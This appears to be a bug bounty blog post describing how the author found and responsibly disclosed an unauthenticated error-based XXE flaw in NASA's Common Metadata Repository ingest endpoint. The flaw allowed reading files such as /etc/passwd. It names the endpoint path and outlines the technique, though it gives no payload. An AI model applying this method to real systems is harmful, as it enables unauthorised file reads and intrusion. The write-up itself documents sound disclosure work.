None

NASA's VDP is one of the most targeted programs by hackers worldwide, so finding something that isn't a duplicate or marked as Not Applicable requires creative recon and a different approach than most other researchers.

NASA awards every researcher who finds and exploits a valid vulnerability with a letter of recognition. I wanted that letter, and I wanted it tied to something truly impactful. With 10.6k accepted vulnerabilities and more than 1k still open at the time, I knew it wouldn't be easy — most submissions would end up marked as duplicates. No rewards for second place.

But hey, I had nothing to lose, so it was worth trying.

The Approach

I wanted to avoid duplicates, so my first filter was Bugcrowd. Bugcrowd has a nice feature that lets you see what's already been reported and the unique‑to‑duplicate ratio.

None

As Bugcrowd says:

Unique includes issues in Triaged, Unresolved, and Informational states while Total includes Duplicates of unique known issues

By looking at the known issues we can see, for example, that a reflected XSS had more than 340 duplicates with only 16 unique reports.

None

So hunting reflected XSS would largely be a waste of time. I took this as guidance on what to hunt and what would result in a much lower chance of duplication. You get the idea.

The Hunt

Like many hunters, I started with recon — Subfinder, Amass and dorking. I spent a week, every day after work, mapping targets until I stumbled on a page that consistently took longer than usual to load.

That caught my interest, so I waited. Once it finally loaded, I jumped straight into the JavaScript files to look for clues as to why it was taking so long. I found a bunch of endpoints and began testing them.

The page was an interface to interact with the Common Metadata Repository.

The CMR is a high‑performance, authoritative metadata system within NASA's Earth Observing System Data and Information System. It stores standardized records describing datasets, granules, and related services, and exposes them via APIs so data can be registered, discovered, and accessed across NASA's Earthdata ecosystem. It's the backbone that makes NASA Earth observation data searchable and interoperable.

Next step: Github.

The repository is actively maintained, I dove into the docs and started building requests. While some endpoints needed authentication, most did not. Not long after I discovered the Ingest Component

responsible for collaborating with metadata db and indexer components of the CMR system to maintain the lifecycle of concepts coming into the system.

and the following endpoint:

/ingest/providers/*/validate/collection/*

Normally the endpoint requires an authentication token, but I discovered that it was accepting and processing XML from unauthenticated users before validating the authentication token and blocking the request.

Not only did it return clear parsing errors to unauthenticated users, but it also allowed external entities.

This endpoint was used in SIT, UAT and Production environments.

I focused only on UAT and Production as SIT was returning 403 and I didn't want to waste time on bypasses.

The Exploitation

Everything led to an XXE hunt.

There are plenty of resources about XML External Entity Injection so I won't spend time explaining the vulnerability here. Others have already done so and far better than I could.

I went back to the Known Issues in Bugcrowd and there were no reports opened for this particular injection. Either NASA assets are well secured, or no one had looked yet. I took the gamble and followed the lead.

I began the exploitation by confirming out-of-band (OOB) interaction. DNS resolution and HTTP requests were received, confirming that the external entity was being processed. However, without data exfiltration (or RCE in some cases), this type of behavior is typically classified as a P5 (Informative — no immediate impact)

I had to go deeper.

I tried a few out-of-band exfiltration techniques but couldn't retrieve any content (skill issue 😅), so I moved on to in-band reads.

I swapped the URL for file:///etc/passwdand then file:///etc/hostname— same story each time: no content, just CMR parsing errors.

But wait, parsing errors? Parsing Errors!

I remembered there is a XXE technique for file content exfiltration via error messages. If you can trigger the right parsing error, the system may end up echoing sensitive data directly in the error response.

I first crafted a valid request, then intentionally broke it to trigger a parsing error.

Forging a valid request was crucial: it allowed me to isolate the parsing logic from authentication and other issues. In a sense, I had more control over the error returned.

After some minutes of trial and error, guided by verbose logs, I managed to craft a valid request — from there the exploitation was straightforward.

The response came back containing the full content of /etc/passwd (or any other file)

None
/etc/passwd content

Error-based XXE achieved. Arbitrary file read. Severity: Critical (P1).

(Side note: file was not the only protocol enabled)

As per NASA VDP rules I stopped the testing and reported. I knew it was not going to be a duplicate — there were no open XXE reports, and it was unlikely someone had found the same issue on the exact same day.

Timeline

26th October — I reported the vulnerability

27th October — Bugcrowd Triaged as P1

31st October — Accepted by NASA Team

17th November — A pull request was opened to address the vulnerability

21st November — The fix was released

28th November — Received the Letter Of Appreciation

17th December — Report disclosed

None

After that, I took a one-week break to reset and learn a few new things.

Coming back with a fresher mind, I applied the same methodology and uncovered an SSRF vulnerability affecting internal services. It was triaged and accepted as a P3, leading to my second LOR.

None

and just few days ago I managed to discover another P3 and even a P2 which are currently being addressed.

None

But these are for another story 😉

I was really happy to receive my letters as a testament that my efforts and methodology had paid off. Along the way, I learned really a lot. I explored and touched technologies I had never heard of before and figuring out how to break them was both rewarding and genuinely fun.

My second LOR

Lesson learned: lock in. Stop going after easy bugs and start putting in real work. Finding impactful vulnerabilities requires focus, patience, and deliberate thinking. That mindset always pays off.

Good luck on your next hunt!